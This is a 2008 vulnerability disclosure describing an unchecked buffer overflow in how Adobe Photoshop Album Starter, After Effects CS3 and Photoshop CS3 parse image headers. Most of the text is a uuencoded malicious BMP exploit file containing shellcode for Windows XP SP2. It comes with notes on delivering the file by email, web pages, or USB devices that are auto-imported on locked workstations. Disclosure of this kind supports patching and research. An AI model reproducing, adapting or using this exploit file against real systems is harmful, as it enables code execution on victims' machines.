Exploitable issue in various Adobe products<br>c0ntex (<a href="mailto:c0ntexb@gmail.com">c0ntexb@gmail.com</a>) Scott Laurie<br>February 2008<br><br>Vulnerable applications, tested:<br>Adobe Photoshop Album Starter<br>Adobe After Effects CS3<br>
Adobe Photoshop CS3<br><br>Not Vulnerable applications, tested:<br>Adobe Reader<br>Adobe Flash Player<br><br>This bug is related to the parsing of header images, in that the applications<br>do not verify that the image header is valid before trying to render it. This<br>
leaves an opportunity to cause an unchecked buffer overflow and allow for the<br>execution of malicious code.<br><br>All the issues are standard local overflows whereby an attacker can exploit a<br>machine after sending the malicious image to the user, or by placing the image<br>
on a web site or email and waiting for a user to view it in one of the effected<br>products.<br><br>One fun thing with Album Starter is that it will run a service which will look<br>for new devices being attached to the system, things like cameras or USB drives<br>
and when one is found it will check the device for image files. If some are<br>found, the application will auto-run and import the images and thus allow the<br>attacker to exploit locked workstations.. pretty lame but fun :)<br>
<br>There is a caveats to the bug as the shellcode and return address need to be 4<br>byte values. Thus a return address of 0x41424344 needs to be in the following<br>format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"<br>
<br><br>Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:<br>Used shellcode is taken from the Metasploit project.<br><br><br>begin 644 Adobe_AS_Exploit.bmp<br>M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/<br>
M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM?<br>M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`<K8M`"%YHCDX.[%#_UF939F@S,FAW<br>M<S)?5/_0:,OM_#M0_]9?B>5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_<br>
MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90<br>M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^<br>M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!<Y3_]9J__\W<br>
M_]"+5_R#Q&3_UE+_T&CPB@1?4__6_]``04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!<br>
M04%!04%!04%!04%!04%!04%!04%!0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"<br>
M0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D-#0T-#0T-#0T-#0T-#<br>M0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#0T-#Z^OKZP0$!`20D)"0<br>MD)"0D&9F9F9=75U=L+"PL&%A86&0D)"0D)"0D)"0D)"0D)"0,S,S,\G)R<F#<br>
M@X.#Z>GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S<br>M<W,3$Q,36EI:6N[N[NXG)R<GBHJ*BH.#@X/KZ^OK_/S\_.+BXN+T]/3TIJ:F<br>MI@8&!@9C8V-CBHJ*BEI:6EKN[N[NK*RLK,_/S\]F9F9F965E95M;6UN/CX^/<br>
M(B(B(N_O[^_(R,C(`0$!`145%17V]O;VK*RLK-75U=5Z>GIZ[^_O[\S,S,S#<br>MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G<br>MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ<br>
MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1<br>MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ<br>ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ<br>
MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*<br>MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N<br>MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN<G)R<MG9V=DN<br>
M+BXN7%Q<7-K:VMHR,C(R'AX>'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0<br>MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R<br>1\C\_/S_N[N[N)R<G)XJ*BHH`<br>`<br>end<br>
<br><br><br>regards<br>c0ntex<br>